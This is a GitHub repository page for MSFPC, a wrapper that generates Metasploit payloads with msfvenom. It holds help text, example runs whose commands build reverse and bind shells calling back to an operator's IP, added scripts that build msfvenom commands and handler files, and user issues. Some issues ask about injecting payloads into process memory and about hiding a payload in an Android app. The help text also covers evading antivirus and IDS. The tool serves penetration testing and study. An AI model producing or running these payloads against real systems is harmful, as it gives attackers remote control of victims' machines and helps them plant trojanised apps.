g0tmi1k / msfpc

MSFvenom Payload Creator (MSFPC)

Home Page: https://blog.g0tmi1k.com/

License: MIT License

Shell 100.00%
msfvenom msfvenom-payload mpc msfpc payload payload-generator payload-generation metasploit-framework metasploit kali

msfpc's Introduction

MSFvenom Payload Creator (MSFPC)

A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).



About

MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (requiring only one input) to produce a payload.

Fully automating msfvenom & Metasploit is the end goal (as well as being able to automate MSFPC itself). The rest is about making the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production, and accepting any argument in any order and in various formats/patterns).

The only necessary input from the user should be the payload they want, defined either by the platform (e.g. windows) or by the file extension they wish the payload to have (e.g. exe).

  • Can't remember your IP for an interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MSFPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will NOT try to bypass any anti-virus solutions at any stage.

## Install

  • Designed for Kali Linux v2.x/Rolling & Metasploit v4.11+.
  • Kali v1.x should work.
  • OSX 10.11+ should work.
  • Weakerth4n 6+ should work.
  • ...nothing else has been tested.

$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Note: -k makes curl skip TLS certificate verification, so the script can be swapped on the wire before it lands in your PATH. Drop it unless you genuinely cannot validate GitHub's certificate, and read the script before installing it.

Kali-Linux

MSFPC is already packaged in Kali Rolling, so all you have to do is:

root@kali:~# apt install -y msfpc

## Help

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
            msfpc.sh help verbose                # Help screen, with even more information.

 <TYPE>:
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]
   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting <DOMAIN/IP>, you can give an interface name and MSFPC will detect that IP address.
 Missing <DOMAIN/IP> will default to the IP menu.

 Missing <PORT> will default to 443.

 <CMD> is a standard/native command prompt/terminal to interact with.
 <MSF> is a custom cross-platform shell, gaining the full power of Metasploit.
 Missing <CMD/MSF> will default to <MSF> where possible.
   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 <CMD> payloads are generally smaller than <MSF> and easier to get past EMET, but have limited Metasploit post module/script support.
 <MSF> payloads are generally much larger than <CMD>, as they come with more features.

 <BIND> opens a port on the target side, and the attacker connects to it. Commonly blocked by ingress firewall rules on the target.
 <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked by egress firewall rules on the target.
 Missing <BIND/REVERSE> will default to <REVERSE>.
 <BIND> allows the attacker to connect whenever they wish. <REVERSE> needs the target to keep connecting back to maintain access.

 <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 <STAGED> are 'better' in low-bandwidth/high-latency environments.
 <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 <TCP> is the standard method of connecting back. This is the most compatible with TYPES as it's RAW. Can be easily detected by IDSs.
 <HTTP> makes the communication look like (unencrypted) HTTP traffic. Helpful against packet inspection that limits port access by protocol - e.g. TCP 80.
 <HTTPS> makes the communication look like (encrypted) HTTP traffic over SSL/TLS. Helpful against packet inspection that limits port access by protocol - e.g. TCP 443.
 <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with strict ingress/egress firewall rules. Will switch to 'allports' based on <TYPE>.
 Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 Altering the traffic, as <HTTP> and even more so <HTTPS> do, will slow down the communication & increase the payload size.
 More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGELESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 <LOOP> will just create one of each <TYPE>.

 <VERBOSE> will display more information.
$
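The help text above boils down to a naming rule and a handler file: a staged payload is <platform>/<shell>/<direction>_<method>, a stageless one is <platform>/<shell>_<direction>_<method>, the output file is named after the same words, and the .rc file drives exploit/multi/handler. The following is an added example, not MSFPC's own code, showing those rules in a few POSIX sh functions. It only maps the windows, linux (x86) and python platforms from this page's examples; the function names are mine, and the msfvenom command is printed rather than executed.

```shell
#!/bin/sh
# Added example, not MSFPC's own code: derive the Metasploit payload name,
# an MSFPC-style output filename, the msfvenom invocation and a matching
# multi/handler resource file from the option words in the help text.
#
# Assumptions (hypothetical, for illustration): only the windows, linux
# and python platforms are mapped, x86 only, as in this page's examples.

# platform_path TYPE -> module path prefix for the platform
platform_path() {
  case "$1" in
    windows|exe) echo "windows" ;;
    linux|elf)   echo "linux/x86" ;;
    python|py)   echo "python" ;;
    *) echo "unsupported type: $1" >&2; return 1 ;;
  esac
}

# shell_name msf|cmd -> meterpreter|shell
shell_name() {
  case "$1" in
    msf) echo "meterpreter" ;;
    cmd) echo "shell" ;;
    *) echo "shell must be msf or cmd" >&2; return 1 ;;
  esac
}

# payload_name TYPE SHELL DIRECTION STAGE METHOD
#   DIRECTION: reverse|bind  STAGE: staged|stageless  METHOD: tcp|http|https
#   Staged payloads keep the stager in its own path component
#   (windows/meterpreter/reverse_tcp); stageless ones join it with an
#   underscore (python/shell_reverse_tcp).
payload_name() {
  prefix=$(platform_path "$1") || return 1
  shell=$(shell_name "$2") || return 1
  case "$4" in
    staged)    echo "${prefix}/${shell}/${3}_${5}" ;;
    stageless) echo "${prefix}/${shell}_${3}_${5}" ;;
    *) echo "stage must be staged or stageless" >&2; return 1 ;;
  esac
}

# output_name TYPE SHELL DIRECTION STAGE METHOD PORT EXT
#   -> '<type>-<shell>-<stage>-<direction>-<method>-<port>.<ext>',
#   the pattern used in the examples on this page.
output_name() {
  shell=$(shell_name "$2") || return 1
  echo "${1}-${shell}-${4}-${3}-${5}-${6}.${7}"
}

# venom_cmd PAYLOAD FORMAT HOST PORT OUTFILE -> the msfvenom command line
#   (printed, not executed). A bind payload listens on the target, so it
#   takes no LHOST; output goes through a redirect, which also works on
#   older msfvenom builds that lack -o.
venom_cmd() {
  case "$1" in
    *bind*) opts="LPORT=$4" ;;
    *)      opts="LHOST=$3 LPORT=$4" ;;
  esac
  echo "msfvenom -p $1 -f $2 -e generic/none $opts > '$5'"
}

# handler_rc PAYLOAD HOST PORT -> msfconsole resource file contents
#   For a bind payload the handler connects out, so the target address is
#   RHOST; for a reverse payload it listens on LHOST. ExitOnSession false
#   with -j keeps the job alive across reconnects, which matters for
#   reverse payloads that must keep calling back.
handler_rc() {
  case "$1" in
    *bind*) host_line="set RHOST $2" ;;
    *)      host_line="set LHOST $2" ;;
  esac
  printf '%s\n' \
    "use exploit/multi/handler" \
    "set PAYLOAD $1" \
    "$host_line" \
    "set LPORT $3" \
    "set ExitOnSession false" \
    "exploit -j"
}

# Walk through Example #2 from the page: linux, cmd shell, bind, staged, tcp.
p=$(payload_name elf cmd bind staged tcp)
f=$(output_name linux cmd bind staged tcp 4444 elf)
venom_cmd "$p" elf 192.168.103.142 4444 "/root/$f"
handler_rc "$p" 192.168.103.142 4444
```

The bind case is the one worth checking by hand: the generated msfvenom line carries no LHOST (the target listens), and the handler sets RHOST rather than LHOST, which is the mistake most hand-written resource files make.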

Example #1 (Windows, Fully Automated Using Manual IP)

$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
  > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)

$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
  > '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #3 (Python Format, Interactive IP Menu)

$ msfpc stageless cmd py tcp
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 [i] Use which interface - IP address?:
 [i]   1.) eth0 - 192.168.103.142
 [i]   2.) lo - 127.0.0.1
 [i]   3.) wan - 31.204.154.174
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.142
 [i] PORT: 443
 [i] TYPE: python (python/shell_reverse_tcp)
 [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
  > '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)

$ ./msfpc.sh loop wan
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i] Loop Mode. Creating one of each TYPE, with default values

 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: xxx.xxx.xxx.xxx
 [i] PORT: 443
 [i] TYPE: android (android/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
  > '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!


 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

 [*] Done!

$

Note: Removed WAN IP.


To-Do List

  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

msfpc's People

Contributors

benichmt1 avatar g0tmi1k avatar kernelsmith avatar yugoslavskiy avatar


msfpc's Issues

BUG: unable to find IP

Hi,
I've just setup the rolling repo and upgraded and it looks like the new ifconfig version is preventing MPC from identifying the IP on the interfaces.

root@kaliiso:/var/github/royharoush/mpc# ./mpc.sh
 [*] Msfvenom Payload Creator (MPC v1.4)
 [i] Something went wrong. Couldn't discover IP addresses. =(
 [i] Need to manually define it.   ./mpc.sh --ip <IP>

Even when defining an IP manually it won't work.

root@kaliiso:/var/github/royharoush/mpc# ./mpc.sh --ip 10.10.10.10
 [*] Msfvenom Payload Creator (MPC v1.4)
 [i] Something went wrong. Couldn't discover IP addresses. =(
 [i] Need to manually define it.   ./mpc.sh --ip <IP>

The new ifconfig output is shown in this format:

[image]

The old one:

[image]

obviously this isn't really an issue since we can only keep using the old repo, at least for a while.
just thought you should know.

Roy

how does msfvenom generate those assembly bytes from a c/c++ payload?

The msfvenom tool, using this command, e.g. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f csharp, will generate the assembly bytes of a payload written in the C language.

I've been looking for a way to do this with my cpp payload for 7 days but I found nothing about this online. I have a payload written in cpp but I want to inject it into memory and execute it in a new process.

I've compiled it into an exe and injected it using a complex way but it caused many issues, and after solving those issues the app still gives an error from time to time; I guess it's because injecting an exe binary is a lot more difficult than I thought.

So I thought the way that msfvenom does it is easier and better, but I've been stuck with it for 7 days with no result. I thought I could just write the whole payload in assembly, but after realizing that the size of the payload reached 200kb I said no way.

Again I thought that I could just copy the assembly bytes from the disassembly window in Visual Studio, but a guy on Stack Overflow told me that it's not going to work, you need to write it manually in assembly or code it in hex manually using the instruction reference. I don't know what the second option means, but manually is definitely a hard way of doing it.

But how does msfvenom do it automatically???

Question

Hello I have a question.
I inject payload in app with msfvenom.

When I install app infected in my Android it doesn't ask for any permission...

There is a way to resolve this problem??

Thanks.

Add support for MacOS?

On Mac OS, msfpc behaves differently from on Linux.

Could the support on MacOS be added? Thanks.

$ ./msfpc.sh 
 [*] MSFvenom Payload Creator (MSFPC v1.4.5)
ifconfig: invalid option -- 'u'
Try 'ifconfig --help' or 'ifconfig --usage' for more information.
 [i] Something went wrong. Couldn't find any network interfaces
 [i] Need to manually define an IP.   ./msfpc.sh --ip <IP>
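The report above and the earlier "BUG: unable to find IP" issue fail for the same reason: the interface lookup scrapes ifconfig, whose output layout changed between net-tools releases and whose -u flag exists on BSD/macOS but not in the GNU version. The following is an added example, not MSFPC's own code, of a resolver that prefers iproute2's one-line ip -o -4 addr show format, falls back to a flag-less ifconfig, parses all three layouts with one pattern, validates the octets, and fails closed instead of guessing. The function names are mine and the sample outputs are constructed for the demonstration, not captured from a real host.

```shell
#!/bin/sh
# Added example, not MSFPC's own code: resolve an interface name to its
# IPv4 address without depending on one particular ifconfig layout.

# valid_ipv4 ADDR -> 0 if ADDR is four octets of 0-255, else 1
valid_ipv4() {
  old_ifs=$IFS
  IFS=.
  set -- $1
  IFS=$old_ifs
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case "$octet" in ''|*[!0-9]*) return 1 ;; esac
    [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# first_ipv4_from_text TEXT -> first IPv4 that follows 'inet' in TEXT
#   Handles the three layouts that have broken ifconfig scrapers:
#     old net-tools:  inet addr:192.168.103.142  Bcast:...
#     new net-tools:  inet 192.168.103.142  netmask ...
#     iproute2 -o:    2: eth0    inet 192.168.103.142/24 brd ...
#   'inet6' lines never match because the pattern needs 'inet ' then a digit.
#   Prints nothing and returns 1 when no well-formed address is present.
first_ipv4_from_text() {
  addr=$(printf '%s\n' "$1" |
    sed -n 's/.*inet \(addr:\)\{0,1\}\([0-9]\{1,3\}\(\.[0-9]\{1,3\}\)\{3\}\).*/\2/p' |
    head -n 1)
  [ -n "$addr" ] || return 1
  valid_ipv4 "$addr" || return 1
  echo "$addr"
}

# iface_ip IFACE -> that interface's IPv4, preferring ip(8); ifconfig is
#   the fallback, called with no flags because GNU ifconfig rejects BSD's -u.
iface_ip() {
  if command -v ip >/dev/null 2>&1; then
    out=$(ip -o -4 addr show dev "$1" 2>/dev/null) || out=""
  elif command -v ifconfig >/dev/null 2>&1; then
    out=$(ifconfig "$1" 2>/dev/null) || out=""
  else
    echo "neither ip nor ifconfig is available" >&2
    return 1
  fi
  first_ipv4_from_text "$out" || { echo "no IPv4 address on $1" >&2; return 1; }
}

# Constructed sample outputs (not captured from a real host) for the demo.
OLD_IFCONFIG='eth0      Link encap:Ethernet  HWaddr 00:0c:29:aa:bb:cc
          inet addr:192.168.103.142  Bcast:192.168.103.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feaa:bbcc/64 Scope:Link'
NEW_IFCONFIG='eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.103.142  netmask 255.255.255.0  broadcast 192.168.103.255
        inet6 fe80::20c:29ff:feaa:bbcc  prefixlen 64  scopeid 0x20<link>'
IP_ONELINE='2: eth0    inet 192.168.103.142/24 brd 192.168.103.255 scope global eth0\       valid_lft forever preferred_lft forever'

for sample in "$OLD_IFCONFIG" "$NEW_IFCONFIG" "$IP_ONELINE"; do
  first_ipv4_from_text "$sample"
done
```

Call iface_ip eth0 on a live box to see the real path; the parser is kept separate from the command so the layout handling can be tested with pasted output from whichever platform misbehaves next.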

APK payload

Hope an option to create an APK payload is added.

exe-service windows format

AFAICT, there's no way to have mpc build a service exe (vs a standard exe). The msfvenom command would be msfvenom -p blah -f exe-service

I made the changes to accommodate it, testing now, want a PR?

unloadable payload

Hello,
Does anyone have any insight about this error, because I can't find any related issue.

The error says Error: Unloadable payload every time I try to build any payload.

Error creating file in MSF 4.10

The generated cmd for msfvenom in lines 360-558 use "-o outputfile" which is not supported with msf 4.10. A quick change to "> outputfile" will fix the issue.

Cheers. I put 1 beer on your tab...

Add option to specify custom IP/hostname for payload

Thanks for your hard work on this script!
Would it be possible to add an option to specify a different IP or a domain when selecting ip address (eth interface) use? Some complex setups mean we use diff IP addresses to those of the interfaces

Also will 64bit payloads be supported?

payload was unable to create

root@kali:/home/Downloads/msfpc# ./msfpc.sh windows 192.168.1.9
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 192.168.1.9
[i] PORT: 443
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe
--platform windows -a x86 -e generic/none LHOST=192.168.1.5 LPORT=443 \

'/home/Downloads/msfpc/windows-meterpreter-staged-reverse-tcp-443.exe'

[i] Something went wrong. Issue creating file =(.


Could not find nokogiri-1.10.8 in any of the sources
Run bundle install to install missing gems.
Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

/usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:86:in `block in materialize': Could not find nokogiri-1.10.8 in any of the sources (Bundler::GemNotFound)
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in `map!'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/spec_set.rb:80:in `materialize'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:170:in `specs'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:237:in `specs_for'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/definition.rb:226:in `requested_specs'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:101:in `block in definition_method'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/runtime.rb:20:in `setup'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler.rb:149:in `setup'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `block in <top (required)>'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:136:in `with_level'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/ui/shell.rb:88:in `silence'
  from /usr/local/rvm/gems/ruby-2.6.5/gems/bundler-2.1.4/lib/bundler/setup.rb:20:in `<top (required)>'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
  from /usr/share/metasploit-framework/config/boot.rb:28:in `<top (required)>'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:92:in `require'
  from /usr/share/metasploit-framework/lib/msfenv.rb:12:in `<top (required)>'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in `require'
  from /usr/local/rvm/rubies/ruby-2.6.5/lib/ruby/site_ruby/2.6.0/rubygems/core_ext/kernel_require.rb:72:in `require'
  from /usr/bin/msfvenom:18:in `require_deps'
  from /usr/bin/msfvenom:36:in `init_framework'
  from /usr/bin/msfvenom:55:in `framework'
  from /usr/bin/msfvenom:446:in `'

I have installed nokogiri-1.10.8 and it still shows the same error.
I am using Kali Linux 2019.3 amd64.

Thank You

Iterations possible?

Is there a way to add the number of iterations I want from the encoder? I may have missed it, but I looked all through the documentation and the help.

The payload could not be generated, check options

Hello, I am new to this whole thing and was trying to create a payload. I am following this tutorial https://www.youtube.com/watch?v=rY07SB7Y9mw but instead of the Windows reverse TCP meterpreter framework I was using the Android one. This is the code I used:

msfvenom -p android/meterpreter_reverse_tcp LOCALHOST=my ip was here LPORT=443 -f exe > outl.exe

but when I executed it I got:

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 80454 bytes
Error: The payload could not be generated, check options

and it didn't create the payload. I am new to this thing and would love some help. I am on Kali Linux.
